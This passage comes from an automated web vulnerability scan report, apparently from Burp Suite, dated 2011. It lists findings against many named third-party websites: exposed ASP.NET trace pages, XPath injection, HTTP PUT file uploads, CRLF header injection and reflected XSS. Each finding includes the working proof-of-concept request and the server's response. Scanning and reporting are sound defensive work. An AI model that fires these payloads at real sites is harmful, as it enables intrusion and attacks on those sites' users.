<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

2.3. http://www.pledge.com/trace.axd

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pledge.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.pledge.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:51:27 GMT
Connection: close
Content-Length: 21830

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

2.4. http://www.woodworking.com/trace.axd

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.woodworking.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.woodworking.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Wed, 04 May 2011 03:32:17 GMT
Connection: close

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...

3. XPath injection

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pewforum.org
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pewforum.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.pewforum.org&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=dc9bafc3-1f88-443a-a7e9-781aaebf6fac; expires=Fri, 04-May-2012 02:17:51 GMT; path=/
Set-Cookie: EkAnalytics=0; expires=Fri, 04-May-2012 02:17:51 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:17:51 GMT
Content-Length: 23681

This is an unclosed string.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
...[SNIP]...

4. HTTP PUT enabled
There are 2 instances of this issue:

Issue background

The HTTP PUT method is used to upload data which is saved on the server at a user-supplied URL. If enabled, an attacker can place arbitrary, and potentially malicious, content into the application. Depending on the server's configuration, this may lead to compromise of other users (by uploading client-executable scripts), compromise of the server (by uploading server-executable code), or other attacks.

Issue remediation

You should refer to your platform's documentation to determine how to disable the HTTP PUT method on the server.


4.1. http://www.gradtoday.com/favicon.ico

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gradtoday.com
Path:   /favicon.ico

Issue detail

HTTP PUT is enabled on the web server. The file /7707244d3a7c5f43.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Request 1

PUT /7707244d3a7c5f43.txt HTTP/1.0
Host: www.gradtoday.com
Content-Length: 16

2e5095780c52e581

Response 1

HTTP/1.1 201 Created
Connection: close
Date: Wed, 04 May 2011 01:57:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.gradtoday.com/7707244d3a7c5f43.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /7707244d3a7c5f43.txt HTTP/1.0
Host: www.gradtoday.com

Response 2

HTTP/1.1 200 OK
Content-Length: 16
Content-Type: text/plain
Content-Location: http://www.gradtoday.com/7707244d3a7c5f43.txt
Last-Modified: Wed, 04 May 2011 01:57:40 GMT
Accept-Ranges: bytes
ETag: W/"249669a6fe9cc1:632"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:57:40 GMT
Connection: close

2e5095780c52e581

4.2. http://www.thenursingscholars.com/favicon.ico

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thenursingscholars.com
Path:   /favicon.ico

Issue detail

HTTP PUT is enabled on the web server. The file /8a5aef9c531842f2.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Request 1

PUT /8a5aef9c531842f2.txt HTTP/1.0
Host: www.thenursingscholars.com
Content-Length: 16

b4df595e159cd5e7

Response 1

HTTP/1.1 201 Created
Connection: close
Date: Wed, 04 May 2011 03:47:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.thenursingscholars.com/8a5aef9c531842f2.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /8a5aef9c531842f2.txt HTTP/1.0
Host: www.thenursingscholars.com

Response 2

HTTP/1.1 200 OK
Content-Length: 16
Content-Type: text/plain
Last-Modified: Wed, 04 May 2011 03:47:20 GMT
Accept-Ranges: bytes
ETag: W/"9eb663f8dacc1:a1c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:47:20 GMT
Connection: close

b4df595e159cd5e7

5. HTTP header injection
There are 11 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


5.1. http://www.blogcindario.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogcindario.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e67a6%0d%0a4f4bcb249b4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e67a6%0d%0a4f4bcb249b4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blogcindario.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 04 May 2011 03:22:07 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=120
Location: http://blogcindario.miarroba.es/e67a6
4f4bcb249b4

Content-Length: 178

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

5.2. http://www.freeonlinejobsathome.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freeonlinejobsathome.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d7ea0%0d%0a37c07b155f7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d7ea0%0d%0a37c07b155f7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freeonlinejobsathome.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 01:13:27 GMT
Location: /d7ea0
37c07b155f7
/


5.3. http://www.freestuff4free.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freestuff4free.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 63b68%0d%0a5721c674311 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /63b68%0d%0a5721c674311 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freestuff4free.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 00:44:02 GMT
Location: /63b68
5721c674311
/


5.4. http://www.gatewaync.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gatewaync.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 509f6%0d%0ae5102b583cd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /509f6%0d%0ae5102b583cd HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gatewaync.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.6.32
Date: Wed, 04 May 2011 02:27:04 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: http://www2.gatewaync.com/509f6
e5102b583cd

Server-Name: media2

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/0.6.32</center>
</body>
</html>

5.5. http://www.gunsholstersandgear.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gunsholstersandgear.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d6d79%0d%0a89be4f711f9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d6d79%0d%0a89be4f711f9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gunsholstersandgear.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.8.53
Date: Wed, 04 May 2011 02:40:59 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: http://gunsforsale.com/ghg/d6d79
89be4f711f9


<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>

5.6. http://www.lifeaftertheoilcrash.net/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lifeaftertheoilcrash.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 29009%0d%0aaa14ffab9a3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /29009%0d%0aaa14ffab9a3 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lifeaftertheoilcrash.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 02:19:17 GMT
Location: /29009
aa14ffab9a3
/


5.7. http://www.onlinepublicrecordssearch.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onlinepublicrecordssearch.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 390e6%0d%0aa34bfc1141b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /390e6%0d%0aa34bfc1141b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.onlinepublicrecordssearch.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 01:55:31 GMT
Location: /390e6
a34bfc1141b
/


5.8. http://www.powertrainproducts.net/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.powertrainproducts.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload bc096%0d%0aeab3069c4b2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /bc096%0d%0aeab3069c4b2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.powertrainproducts.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 01:21:44 GMT
Location: /bc096
eab3069c4b2
/


5.9. http://www.schools.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.schools.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5f1df%0d%0a26bc41f2110 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5f1df%0d%0a26bc41f2110 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.schools.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Error
Location: https://www.schools.org/5f1df
26bc41f2110

Server: Microsoft-IIS/5.0
Content-Type: text/html
Content-Length: 165

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://www.schools.org/5f1df
26bc41f2110">here</a></body>

5.10. http://www.verifiedworkathome.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verifiedworkathome.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7ec18%0d%0a89f559e2a7c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7ec18%0d%0a89f559e2a7c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.verifiedworkathome.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 03:21:04 GMT
Location: /7ec18
89f559e2a7c
/


5.11. http://www.wow-pro.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wow-pro.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 95d45%0d%0ad5514d9a0df was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /95d45%0d%0ad5514d9a0df HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wow-pro.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Wed, 04 May 2011 01:18:20 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: http://wow-pro.com/95d45
d5514d9a0df


<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/0.7.67</center>
</body>
</html>

6. Cross-site scripting (reflected)
There are 119 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


6.1. http://4qinvite.4q.iperceptions.com/1.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://4qinvite.4q.iperceptions.com
Path:   /1.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b897a'-alert(1)-'214b9e0ef2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1.aspx?sdfc=71df608f-34559-82b736ed-60a6-4287-9b07-d98b8154b483&lID=1&loc=4Q-WEB2&b897a'-alert(1)-'214b9e0ef2a=1 HTTP/1.1
Host: 4qinvite.4q.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:15:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Srv-By: 4Q-INVITE1
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xga0ep454evqtcyfbmbffqev; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1104

var sID= '34559'; var sC= 'IPE34559'; var brow= 'AppleMAC-Safari'; var vers= '5.0'; var lID= '1'; var loc= '4Q-WEB2'; var ps= 'sdfc=71df608f-34559-82b736ed-60a6-4287-9b07-d98b8154b483&lID=1&loc=4Q-WEB2&b897a'-alert(1)-'214b9e0ef2a=1';var sGA='';function setupGA(url) { return url;}var tC= 'IPEt'; var tCv='?'; CCook(tC,tC,0); tCv= GetC(tC);if (GetC(sC)==null && tCv != null) {CCook(sC,sC,30); Ld();} DCook(tC);function CCook(n,v,d)
...[SNIP]...

6.2. http://4qinvite.4q.iperceptions.com/1.aspx [sdfc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://4qinvite.4q.iperceptions.com
Path:   /1.aspx

Issue detail

The value of the sdfc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc14d'-alert(1)-'0a31bfdbcdc was submitted in the sdfc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1.aspx?sdfc=71df608f-34559-82b736ed-60a6-4287-9b07-d98b8154b483cc14d'-alert(1)-'0a31bfdbcdc&lID=1&loc=4Q-WEB2 HTTP/1.1
Host: 4qinvite.4q.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:14:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Srv-By: 4Q-INVITE1
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ptjpjonetc5l0gfmuztitx45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1101

var sID= '34559'; var sC= 'IPE34559'; var brow= 'AppleMAC-Safari'; var vers= '5.0'; var lID= '1'; var loc= '4Q-WEB2'; var ps= 'sdfc=71df608f-34559-82b736ed-60a6-4287-9b07-d98b8154b483cc14d'-alert(1)-'0a31bfdbcdc&lID=1&loc=4Q-WEB2';var sGA='';function setupGA(url) { return url;}var tC= 'IPEt'; var tCv='?'; CCook(tC,tC,0); tCv= GetC(tC);if (GetC(sC)==null && tCv != null) {CCook(sC,sC,30); Ld();} DCook(tC);funct
...[SNIP]...

6.3. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef5e0'-alert(1)-'48283461885 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193ef5e0'-alert(1)-'48283461885&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII3I4BEAoYASABKAEw5pj87QQQ5pj87QQYAA..; uuid2=2724386019227846218; anj=Kfu=8fG7*@D>7)*0s]#%2L_'x%SEV/i#-5O4FSlRQHqgVr*.vWOENK)ehqWnCsma+$+8hH(K#:4%p3G.v:Z.zDUs_uD`k?idandj8<b_]+Y9)>JxbT-:TrPyR16f>Ne2L7Lz8m^OiiIAJm'jVZEtjuJe$ztL5<-LfW$dXNID7L9mpq(4KKA%VbltLY4eg0$+7#i$q][=3NPKm9PdYU3jeeGKw$iuu$l7(CzVfnEs:6ds3O/53VXJO>l`mQfRy7#>R9s8Gp7?hk^0.X(K:DxR!xu4bKbqa9mrd.?BNS%+<^MUg`c=6U(h<CU!c+81]xA>Sq9y>MmdLRoi#9l24%8e!G9^p8qI)5d<wou'EE<Q4XP=qFe+1Pw8a5e'3-gc4]Adf3p7=/[iQh-:^]yg$pQmdw2xvaX7'fJOCs>R:a43MLOOsrwE*7eD2io=(L6aU8?@-i+J([k/@1oAQ-cih!w=Tvx:(KWA/7i6ARW]l[9>^gfZdqwm4^*Q]M_@X>`PVGCmzFdLtLD05UF'2hjamcs)la=wvWbosXT/%h`Z4EXqQBXL=5LlruN$pcGk].jcuIeJh^o#@0h2+[<_K%TW)KFDNs8G?>Y%.8^aIc/)Z<Q

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 05-May-2011 01:29:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Tue, 02-Aug-2011 01:29:42 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Wed, 04 May 2011 01:29:42 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193ef5e0'-alert(1)-'48283461885&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

6.4. http://admeld.adnxs.com/usersync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae1ed'-alert(1)-'cf9de347f51 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchae1ed'-alert(1)-'cf9de347f51 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
